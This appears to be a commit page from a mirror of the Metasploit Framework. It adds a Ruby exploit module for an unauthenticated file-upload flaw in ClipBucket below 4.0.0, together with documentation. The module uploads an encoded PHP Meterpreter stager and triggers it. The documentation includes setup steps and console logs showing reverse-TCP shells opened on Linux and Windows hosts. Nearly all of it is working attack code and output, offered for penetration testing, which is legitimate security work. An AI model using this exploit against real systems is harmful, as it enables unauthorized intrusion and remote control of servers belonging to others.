infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

clipbucket_fileupload_exec

GSoC/Meterpreter_Web_Console
Touhid M Shaikh 2018-03-12 14:17:13 +05:30
parent b9e0b628ef
commit 9b0ba4a6fa
2 changed files with 251 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

111
documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md Normal file
View File

@ -0,0 +1,111 @@
## Description
A malicious file can be uploaded into the webserver by an unauthenticated attacker. It is possible for an attacker to upload
a malicious script file to issue operating system commands.
## Vulnerable Application
According To publicly exploit Disclosure of ClipBucket < 4.0.0 - Release 4902
this application is vulnerable to Unauthenticated Arbitrary File Upload
read more : https://www.exploit-db.com/exploits/44250/
**Vulnerable Application Link**
https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
## Vulnerable Application Installation Setup.
Download Application : ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```
Unzip : ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```
Move In WebDirectory : ```mv clipbucket-4881/upload/* /var/www/html/```
Change Owner : ```chown -R www-data:www-data /var/www/html/```
**And Follow Clipbucket Installer**
Visit : http://localhost/
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `check`
```
[*] 10.22.1.4:80 The target appears to be vulnerable.
```
7. Do: `set lport <port>`
8. Do: `set lhost <ip>`
9. Do: `exploit`
10. You should get a shell.
## Options
**TARGETURI**
TARGETURI by default is `/`, however it can be changed.
## Scenarios
**TESTED AGAINST LINUX**
```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
rhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
targeturi => clipbucket
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
lport => 5050
msf exploit(multi/http/clipbucket_fileupload_exec) > run
[*] Started reverse TCP handler on 10.22.1.4:5050
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php
[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
[*] Sending stage (37543 bytes) to 10.22.1.4
[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
[+] Deleted 1520842928949a3f.php
meterpreter > sysinfo
Computer : linux
OS : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter >
```
**TESTED AGAINST WINDOWS**
```
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
rhost => 10.22.1.13
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
TARGETURI => clipbucketest
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
lport => 4545
msf exploit(multi/http/clipbucket_fileupload_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.4:4545
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php
[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
[*] Sending stage (37543 bytes) to 10.22.1.13
[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
[+] Deleted 152084407045df09.php
meterpreter > sysinfo
Computer : AGENT22-PC
OS : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >
```

140
modules/exploits/multi/http/clipbucket_fileupload_exec.rb Normal file
View File

@ -0,0 +1,140 @@
##
# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ClipBucket Unauthenticated Arbitrary File Upload lower than 4.0.0 - Release 4902",
'Description' => %q{
This module exploits a vulnerability found in ClipBucket version Lower than 4.0.0 - Release 4902.
A malicious file can be uploaded into the webserver using Unauthenticated Arbitrary File Upload attack.
It is possible for an attacker to upload a malicious script to issue operating system commands.
this issue caused by improper session handling in /action/beats uploader.php file. This module tested on ClipBucket [lt] 4.0.0 - Release 4902 in Windows7 and Kali Linux .
},
'License' => MSF_LICENSE,
'Author' =>
[
'www.sec-consult.com', # Vulnerability Discovery, PoC
'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module
],
'References' =>
[
[ 'EDB', '44250' ]
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Clipbucket < 4.0.0 - Release 4902', {}]
],
'Privileged' => false,
'DisclosureDate' => "Mar 03 2018",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
])
end
def uri
return target_uri.path
end
def check
# Check version
peer = "#{rhost}:#{rport}"
vprint_status("Trying to detect ClipBucket on target.")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "readme")
})
res2 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "actions", "beats_uploader.php")
})
if res and res.code == 200 and res.body =~ /ClipBucket/ and res2.code == 200
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Unknown
end
vprint_status("Version NOT detected")
end
def exploit
peer = "#{rhost}:#{rport}"
# generate the PHP meterpreter payload
stager = '<?php '
stager << payload.encode
stager << '?>'
# Setting POST data
post_data = Rex::MIME::Message.new
post_data.add_part(stager, content_type = "application/octet-stream", transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"pfile.php\"") # payload
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"plupload\"") # require for uploading
post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"name\"")
data = post_data.to_s
print_status("Uploading payload..")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "actions", "beats_uploader.php"),
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
jsonres = res.get_json_document
# If the server returns 200 and success yes, we assume we uploaded the malicious
# file successfully
if not res or res.code != 200 or jsonres['success'] != 'yes'
fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
end
print_good("Looking For Payload .... ")
pdir = jsonres['file_directory']
file_name = jsonres['file_name']
pext = jsonres['extension']
print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext} ")
# Payload name
pname = file_name + ".php"
# Cleanup is Good Idea .
register_files_for_cleanup(pname)
print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "actions", pdir, pname)
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("Unexpected response, probably the exploit failed")
end
end
end